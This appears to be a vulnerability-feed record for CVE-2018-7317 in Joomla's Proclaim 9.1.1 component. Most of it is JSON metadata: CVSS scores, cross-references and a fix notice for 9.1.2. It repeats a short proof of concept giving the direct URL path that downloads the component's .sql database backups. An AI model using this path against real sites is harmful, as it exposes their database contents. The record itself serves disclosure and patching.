ID PACKETSTORM:146546
Type packetstorm
Reporter Ihsan Sencan
Modified 2018-02-23T00:00:00
Description
`# # # #
# Exploit Title: Joomla! Component Proclaim 9.1.1 - Backup Download
# Dork: N/A
# Date: 22.02.2018
# Vendor Homepage: https://www.christianwebministries.org/
# Software Link: https://extensions.joomla.org/extensions/extension/living/religion/proclaim/
# Software Download: https://github.com/Joomla-Bible-Study/Joomla-Bible-Study/releases/download/v9.1.1/pkg_proclaim.zip
# Version: 9.1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-7317
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/media/com_biblestudy/backup/
#
# http://localhost/[PATH]/media/com_biblestudy/backup/Joomla375_jbs-db-backup_2018_February_22_1518955684.sql
#
# # # #
`
{"id": "PACKETSTORM:146546", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Joomla! Proclaim 9.1.1 Backup Disclosure", "description": "", "published": "2018-02-23T00:00:00", "modified": "2018-02-23T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/146546/Joomla-Proclaim-9.1.1-Backup-Disclosure.html", "reporter": "Ihsan Sencan", "references": [], "cvelist": ["CVE-2018-7317"], "lastseen": "2018-02-24T00:58:03", "viewCount": 13, "enchantments": {"score": {"value": 4.6, "vector": "NONE"}, "dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2019-1094"]}, {"type": "cve", "idList": ["CVE-2018-7317"]}, {"type": "exploitdb", "idList": ["EDB-ID:44159"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B115ED933DE761EFA1CA7EE42C3A61CB"]}, {"type": "joomla", "idList": ["JVEL:569"]}, {"type": "zdt", "idList": ["1337DAY-ID-29865"]}], "rev": 4}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2019-1094"]}, {"type": "cve", "idList": ["CVE-2018-7317"]}, {"type": "exploitdb", "idList": ["EDB-ID:44159"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B115ED933DE761EFA1CA7EE42C3A61CB"]}, {"type": "joomla", "idList": ["JVEL:569"]}, {"type": "zdt", "idList": ["1337DAY-ID-29865"]}]}, "exploitation": null, "vulnersScore": 4.6}, "sourceHref": "https://packetstormsecurity.com/files/download/146546/joomlaproclaim911-disclsoe.txt", "sourceData": "`# # # # \n# Exploit Title: Joomla! Component Proclaim 9.1.1 - Backup Download \n# Dork: N/A \n# Date: 22.02.2018 \n# Vendor Homepage: https://www.christianwebministries.org/ \n# Software Link: https://extensions.joomla.org/extensions/extension/living/religion/proclaim/ \n# Software Download: https://github.com/Joomla-Bible-Study/Joomla-Bible-Study/releases/download/v9.1.1/pkg_proclaim.zip \n# Version: 9.1.1 \n# Category: Webapps \n# Tested on: WiN7_x64/KaLiLinuX_x64 \n# CVE: CVE-2018-7317 \n# # # # \n# Exploit Author: Ihsan Sencan \n# # # # \n# \n# POC: \n# \n# 1) \n# http://localhost/[PATH]/media/com_biblestudy/backup/ \n# \n# http://localhost/[PATH]/media/com_biblestudy/backup/Joomla375_jbs-db-backup_2018_February_22_1518955684.sql \n# \n# # # # \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645362037}}
{"zdt": [{"lastseen": "2018-04-13T09:46:29", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2018-02-22T00:00:00", "type": "zdt", "title": "Joomla Proclaim 9.1.1 Component - Backup File Download Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7317"], "modified": "2018-02-22T00:00:00", "id": "1337DAY-ID-29865", "href": "https://0day.today/exploit/description/29865", "sourceData": "# # # #\r\n# Exploit Title: Joomla! Component Proclaim 9.1.1 - Backup Download\r\n# Vendor Homepage: https://www.christianwebministries.org/\r\n# Software Link: https://extensions.joomla.org/extensions/extension/living/religion/proclaim/\r\n# Software Download: https://github.com/Joomla-Bible-Study/Joomla-Bible-Study/releases/download/v9.1.1/pkg_proclaim.zip\r\n# Version: 9.1.1\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2018-7317\r\n# # # #\r\n# Exploit Author: Ihsan Sencan\r\n# # # #\r\n# \r\n# POC: \r\n# \r\n# 1)\r\n# http://localhost/[PATH]/media/com_biblestudy/backup/\r\n# \r\n# http://localhost/[PATH]/media/com_biblestudy/backup/Joomla375_jbs-db-backup_2018_February_22_1518955684.sql\r\n# \r\n# # # #\n\n# 0day.today [2018-04-13] #", "sourceHref": "https://0day.today/exploit/29865", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:19:53", "description": "An information disclosure vulnerability exists in Joomla Component Proclaim. Successful exploitation of this vulnerability would allow a remote attacker to obtain sensitive information.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2019-08-27T00:00:00", "type": "checkpoint_advisories", "title": "Joomla Component Proclaim Backup File Download (CVE-2018-7317)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7317"], "modified": "2019-08-27T00:00:00", "id": "CPAI-2019-1094", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:23", "description": "\nJoomla! Component Proclaim 9.1.1 - Backup File Download", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-02-22T00:00:00", "title": "Joomla! Component Proclaim 9.1.1 - Backup File Download", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7317"], "modified": "2018-02-22T00:00:00", "id": "EXPLOITPACK:B115ED933DE761EFA1CA7EE42C3A61CB", "href": "", "sourceData": "# # # #\n# Exploit Title: Joomla! Component Proclaim 9.1.1 - Backup Download\n# Dork: N/A\n# Date: 22.02.2018\n# Vendor Homepage: https://www.christianwebministries.org/\n# Software Link: https://extensions.joomla.org/extensions/extension/living/religion/proclaim/\n# Software Download: https://github.com/Joomla-Bible-Study/Joomla-Bible-Study/releases/download/v9.1.1/pkg_proclaim.zip\n# Version: 9.1.1\n# Category: Webapps\n# Tested on: WiN7_x64/KaLiLinuX_x64\n# CVE: CVE-2018-7317\n# # # #\n# Exploit Author: Ihsan Sencan\n# # # #\n# \n# POC: \n# \n# 1)\n# http://localhost/[PATH]/media/com_biblestudy/backup/\n# \n# http://localhost/[PATH]/media/com_biblestudy/backup/Joomla375_jbs-db-backup_2018_February_22_1518955684.sql\n# \n# # # #", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2022-03-23T18:36:27", "description": "Backup Download exists in the Proclaim 9.1.1 component for Joomla! via a direct request for a .sql file under backup/.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-02-22T19:29:00", "type": "cve", "title": "CVE-2018-7317", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7317"], "modified": "2018-03-13T15:12:00", "cpe": ["cpe:/a:christianwebministries:proclaim:9.1.1"], "id": "CVE-2018-7317", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-7317", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:christianwebministries:proclaim:9.1.1:*:*:*:*:joomla\\!:*:*"]}], "exploitdb": [{"lastseen": "2022-05-04T17:35:28", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-02-22T00:00:00", "type": "exploitdb", "title": "Joomla! Component Proclaim 9.1.1 - Backup File Download", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["2018-7317", "CVE-2018-7317"], "modified": "2018-02-22T00:00:00", "id": "EDB-ID:44159", "href": "https://www.exploit-db.com/exploits/44159", "sourceData": "# # # #\r\n# Exploit Title: Joomla! Component Proclaim 9.1.1 - Backup Download\r\n# Dork: N/A\r\n# Date: 22.02.2018\r\n# Vendor Homepage: https://www.christianwebministries.org/\r\n# Software Link: https://extensions.joomla.org/extensions/extension/living/religion/proclaim/\r\n# Software Download: https://github.com/Joomla-Bible-Study/Joomla-Bible-Study/releases/download/v9.1.1/pkg_proclaim.zip\r\n# Version: 9.1.1\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2018-7317\r\n# # # #\r\n# Exploit Author: Ihsan Sencan\r\n# # # #\r\n# \r\n# POC: \r\n# \r\n# 1)\r\n# http://localhost/[PATH]/media/com_biblestudy/backup/\r\n# \r\n# http://localhost/[PATH]/media/com_biblestudy/backup/Joomla375_jbs-db-backup_2018_February_22_1518955684.sql\r\n# \r\n# # # #", "sourceHref": "https://www.exploit-db.com/download/44159", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "joomla": [{"lastseen": "2021-07-28T14:33:52", "description": "Proclaim from Christian Web Ministries (installs as com_biblestudy), versions 9.1.1 and previous, arbitrary file upload, also backup file download\n\nresolution: update to 9.1.2 fixes both issues\n\nupdate notice: <https://github.com/Joomla-Bible-Study/Joomla-Bible-Study/releases>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-27T00:00:00", "type": "joomla", "title": "Proclaim, 9.1.1, Arbitrary File Upload", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7316", "CVE-2018-7317"], "modified": "2018-02-27T12:42:35", "id": "JVEL:569", "href": "https://vel.joomla.org", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
